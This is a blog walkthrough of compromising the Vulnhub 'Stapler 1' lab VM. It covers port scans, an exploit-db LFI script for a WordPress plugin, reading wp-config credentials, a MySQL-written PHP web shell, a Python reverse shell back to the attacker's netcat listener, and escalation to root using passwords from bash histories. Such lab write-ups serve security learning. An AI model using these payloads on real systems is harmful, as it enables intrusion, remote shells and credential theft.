Stapler 1
Finally getting back to purpose of this blog! I know I'm going to be rusty, but let's dive right back into the original Vulnhub plans.
This one was nice and easy to get running:
Diving right in, here's the nmap result:
Nmap scan report for 10.10.10.10
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
MAC Address: 08:00:27:5C:69:0C (Oracle VirtualBox virtual NIC)
ftp is going to be a target no doubt, we also want to check out what's running on that port 80, and we love seeing a webserver with mysql! Doom on port 666? That's a troll for sure - I don't know anything about lan doom exploits, yet.
I searched exploitdb for doom, no hits.
The webserver's root page renders this HTML:
I ran dirbuster on it with no results... we'll come back to this.
I ran the metasploit module to identify the FTP version:
msf6 > search ftp_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ftp/ftp_version normal No FTP Version Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(scanner/ftp/ftp_version) > run
[+] 10.10.10.10:21 - FTP Banner: '220-\x0d\x0a220-|-----------------------------------------------------------------------------------------|\x0d\x0a220-| Harry, make sure to update the banner when you get a chance to show who has access here |\x0d\x0a220-|-----------------------------------------------------------------------------------------|\x0d\x0a220-\x0d\x0a220 \x0d\x0a'
[*] 10.10.10.10:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Looks like we couldn't get a version... however, we now know that an admin user's firstname is Harry. I decided to connect to the server and see if the status would disclose a version, no dice:
ftp> status
Connected to 10.10.10.10.
No proxy connection.
Connecting using address family: any.
Mode: stream; Type: ascii; Form: non-print; Structure: file
Verbose: on; Bell: off; Prompting: on; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: on
Tick counter printing: off
I circled back to the HTTP port and started up a more robust traversal tool, dotdotpwn and after it ran for about 30 minutes (I was cooking food) there were not hits... Surely the webstack here isn't for nothing... I ran nikto:
└─$ nikto --host 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.10
+ Target Hostname: 10.10.10.10
+ Target Port: 80
+ Start Time: 2021-01-02 18:00:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2021-01-02 18:00:50 (GMT-5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Interesting, apparently the server is disclosing a .bashrc and .profile response? Let's check it out:
└─$ curl 10.10.10.10/.bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
Nothing of interest there, except the fact that we can seemingly read the filesystem of the user's home dir.
└─$ curl 10.10.10.10/.profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
I tried poking around to read some other common files... but realized I don't even know what OS this is running yet! Let's run a better nmap...
└─$ sudo nmap -O -p- 10.10.10.10
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 18:18 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.10
Host is up (0.00043s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 08:00:27:5C:69:0C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.14 seconds
Not the most useful OS detection, but we've found a new service!
$ curl 10.10.10.10:12380
...
big html response
...
Loaded in a browser:
Okay this looks more interesting... Nothing in searchsploit for creative tim.
Nikto against the port:
─$ nikto --host 10.10.10.10 --port 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.10
+ Target Hostname: 10.10.10.10
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2021-01-02 18:27:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '10.10.10.10' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7993 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-01-02 18:30:00 (GMT-5) (143 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
First searching the apache version, it's vulnerable to a local priv escalation we may be able to use later on.
Now, I tried phpmyadmin, but it just redirects to homepage. Actually, it seems like everything redirects to homepage. Perhaps HTTPS has different behavior?
I tried https /admin112233, and I think I got rekt...
I'm not sure what BeEF-XSS is, but I certainly should! Wow yeah I still have a lot to learn... It's essentially an exploit-kit, open-source and ships with Kali. I guess I should be blocking JS execution in my browser.
Moving on, if I use Https I can load the phpmyadmin page! Great news. A few default username/passwords didn't work.
Here's the robots.txt:
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
And finally, we get a little blog on /blogblog
I clicked the login button, and got a wordpress login page:
You love to see that, this may be the end of the road... from the msfconsole:
msf6 auxiliary(scanner/http/ntlm_info_enumeration) > use auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(scanner/http/wordpress_scanner) > info
Name: Wordpress Scanner
Module: auxiliary/scanner/http/wordpress_scanner
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Christian Mehlmauer <FireFart@gmail.com>
h00die
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PLUGINS true no Detect plugins
PLUGINS_FILE /usr/share/metasploit-framework/data/wordlists/wp-plugins.txt yes File containing plugins to enumerate
PROGRESS 1000 yes how often to print progress
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THEMES true no Detect themes
THEMES_FILE /usr/share/metasploit-framework/data/wordlists/wp-themes.txt yes File containing themes to enumerate
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Description:
Detects Wordpress Versions, Themes, and Plugins
msf6 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(scanner/http/wordpress_scanner) > set RPORT 12380
RPORT => 12380
msf6 auxiliary(scanner/http/wordpress_scanner) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /blogblog
TARGETURI => /blogblog
msf6 auxiliary(scanner/http/wordpress_scanner) > run
[*] Trying 10.10.10.10
[+] 10.10.10.10 - Detected Wordpress 4.2.1
Searchsploit for the version:
└─$ searchsploit wordpress 4.2.1 7 ⨯
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Core < 4.7.1 - Username Enumeration | php/webapps/41497.php
WordPress Core < 4.7.4 - Unauthorized Password Reset | linux/webapps/41963.txt
WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion | php/webapps/44949.txt
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit) | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities | php/webapps/38176.txt
WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload | php/webapps/18991.php
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation | php/webapps/44595.rb
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass | php/webapps/43117.txt
WordPress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation | php/webapps/46083.txt
WordPress Theme F8 Lite 4.2.1 - 's' Cross-Site Scripting | php/webapps/36180.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Knowing the users could be useful...
─$ cat /usr/share/exploitdb/exploits/php/webapps/41497.php 127 ⨯
#!usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
echo "*-----------------------------*\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}
?>
I tried 'https://10.10.10.10/blogblog/wp-json/wp/v2/users' and 'https://10.10.10.10/wp-json/wp/v2/users' to no success.
Every wordpress site has a wp-content directory where we may be able to find plugin's that are installed, which ended up being true!
Searching these on exploit-db...
└─$ searchsploit wordpress advanced video
WordPress Plugin Advanced Video 1.0 - Local File Inclusion | php/webapps/39646.py
And nothing for two-factor.
ShortCode was the most interesting, so I checked the version, which seemed to be 0.1, but then i realized shortcode could be all sorts of things.
I think it's best to try to local file inclusion vector we were first presented with...
#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
# Timeline
# 03/24/2016 - Bug discovered
# 03/24/2016 - Initial notification of vendor
# 04/01/2016 - No answer from vendor, public release of bug
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
# function ave_publishPost(){
# $title = $_REQUEST['title'];
# $term = $_REQUEST['term'];
# $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
# $image_data = file_get_contents($thumb);
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
import random
import urllib2
import re
url = "http://127.0.0.1/wordpress" # insert url to wordpress
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
for line in content:
numbers = re.findall(r'\d+',line)
id = numbers[-1]
id = int(id) / 10
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
urls=re.findall('"(https?://.*?)"', line)
print urllib2.urlopen(urls[0]).read()
So, I made a copy and edited the url to match our target, and ran it:
└─$ python x.py
Traceback (most recent call last):
File "x.py", line 41, in <module>
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python2.7/urllib2.py", line 429, in open
response = self._open(req, data)
File "/usr/lib/python2.7/urllib2.py", line 447, in _open
'_open', req)
File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
result = func(*args)
File "/usr/lib/python2.7/urllib2.py", line 1241, in https_open
context=self._context)
File "/usr/lib/python2.7/urllib2.py", line 1198, in do_open
raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)>
Alright, a bit of stackoverflow later to disable ssl validation for some reason all failed, so I just ran it manually:
$ curl "https://10.10.10.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=100000000000000000&short=rnd&term=rnd&thumb=../wp-config.php" --insecure 60 ⨯
https://10.10.10.10:12380/blogblog/?p=290
This uploads a file into wp-content/uploads: We can then download the file and printout the contents to get the wp-config file!
└─$ wget --no-check-certificate https://10.10.10.10:12380/blogblog/wp-content/uploads/305460154.jpeg
--2021-01-02 21:45:08-- https://10.10.10.10:12380/blogblog/wp-content/uploads/305460154.jpeg
Connecting to 10.10.10.10:12380... connected.
WARNING: The certificate of ‘10.10.10.10’ is not trusted.
WARNING: The certificate of ‘10.10.10.10’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘10.10.10.10’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘305460154.jpeg’
305460154.jpeg 100%[===================================================================================================================>] 2.97K --.-KB/s in 0s
2021-01-02 21:45:08 (111 MB/s) - ‘305460154.jpeg’ saved [3042/3042]
┌──(kali㉿kali)-[~/tmp]
└─$ cat 305460154.jpeg
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
Now we have the sql root admin and password! Logging into phpmyadmin, bingo!
The version of phpmyadmin running isn't vulnerable to any common exploits, let's move onto trying a root mysql shell.
# Login as root on mysql server
$ mysql -u root -p -h 10.10.10.10
# Switch to known-existing database
sql> use wordpress
# Attempt backdoor
sql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
# Locally
$ nc -lp 4444
# In browser:
https://10.10.10.10:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.10.9%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
# Reverse Shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
4.4.0-21-generic
I search the kernel version, and there's a ton of priv-escalation vulnerabilities... but let's explore a little first and see what else we can do. Get a bash shell:
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/home$ find . -readable
find . -readable
.
./MFrei
./MFrei/.bashrc
./MFrei/.bash_history
./MFrei/.bash_logout
./MFrei/.profile
./Sam
./Sam/.bashrc
./Sam/.bash_history
./Sam/.bash_logout
./Sam/.profile
./CCeaser
./CCeaser/.bashrc
./CCeaser/.bash_history
./CCeaser/.bash_logout
./CCeaser/.profile
./www
./www/.bashrc
./www/.bash_logout
./www/.profile
./DSwanger
./DSwanger/.bashrc
./DSwanger/.bash_history
./DSwanger/.bash_logout
./DSwanger/.profile
./JBare
./JBare/.bashrc
./JBare/.bash_history
./JBare/.bash_logout
./JBare/.profile
./mel
./mel/.bashrc
./mel/.bash_history
./mel/.bash_logout
./mel/.profile
./jess
./jess/.bashrc
./jess/.bash_history
./jess/.bash_logout
./jess/.profile
./MBassin
./MBassin/.bashrc
./MBassin/.bash_history
./MBassin/.bash_logout
./MBassin/.profile
./kai
./kai/.bashrc
./kai/.bash_history
./kai/.bash_logout
./kai/.profile
./elly
./elly/.bashrc
./elly/.bash_history
./elly/.bash_logout
./elly/.profile
./Drew
./Drew/.bashrc
./Drew/.bash_history
./Drew/.bash_logout
./Drew/.profile
./JLipps
./JLipps/.bashrc
./JLipps/.bash_history
./JLipps/.bash_logout
./JLipps/.profile
./jamie
./jamie/.bashrc
./jamie/.bash_history
./jamie/.bash_logout
./jamie/.profile
./Taylor
./Taylor/.bashrc
./Taylor/.bash_history
./Taylor/.bash_logout
./Taylor/.profile
./peter
./peter/.zcompdump
./peter/.bashrc
find: './peter/.cache': Permission denied
./peter/.bash_logout
./peter/.sudo_as_admin_successful
./peter/.profile
./SHayslett
./SHayslett/.bashrc
./SHayslett/.bash_history
./SHayslett/.bash_logout
./SHayslett/.profile
./JKanode
./JKanode/.bashrc
./JKanode/.bash_history
./JKanode/.bash_logout
./JKanode/.profile
./AParnell
./AParnell/.bashrc
./AParnell/.bash_history
./AParnell/.bash_logout
./AParnell/.profile
./CJoo
./CJoo/.bashrc
./CJoo/.bash_history
./CJoo/.bash_logout
./CJoo/.profile
./Eeth
./Eeth/.bashrc
./Eeth/.bash_history
./Eeth/.bash_logout
./Eeth/.profile
./RNunemaker
./RNunemaker/.bashrc
./RNunemaker/.bash_history
./RNunemaker/.bash_logout
./RNunemaker/.profile
./SHAY
./SHAY/.bashrc
./SHAY/.bash_history
./SHAY/.bash_logout
./SHAY/.profile
./ETollefson
./ETollefson/.bashrc
./ETollefson/.bash_history
./ETollefson/.bash_logout
./ETollefson/.profile
./IChadwick
./IChadwick/.bashrc
./IChadwick/.bash_history
./IChadwick/.bash_logout
./IChadwick/.profile
./LSolum2
./LSolum2/.bashrc
./LSolum2/.bash_history
./LSolum2/.bash_logout
./LSolum2/.profile
./SStroud
./SStroud/.bashrc
./SStroud/.bash_history
./SStroud/.bash_logout
./SStroud/.profile
./LSolum
./LSolum/.bashrc
./LSolum/.bash_history
./LSolum/.bash_logout
./LSolum/.profile
./NATHAN
./NATHAN/.bashrc
./NATHAN/.bash_history
./NATHAN/.bash_logout
./NATHAN/.profile
./zoe
./zoe/.bashrc
./zoe/.bash_history
./zoe/.bash_logout
./zoe/.profile
# Printout all bash_history
www-data@red:/home$ cat */.bash_history
cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
exit
exit
exit
exit
id
exit
top
ps aux
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
top
exit
# Login as peter
$ su peter
red% id
id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# Get root shell
ed% sudo -i
sudo -i
➜ ~ id
id
uid=0(root) gid=0(root) groups=0(root)
# Have a look at root dir
➜ ~ ls
ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
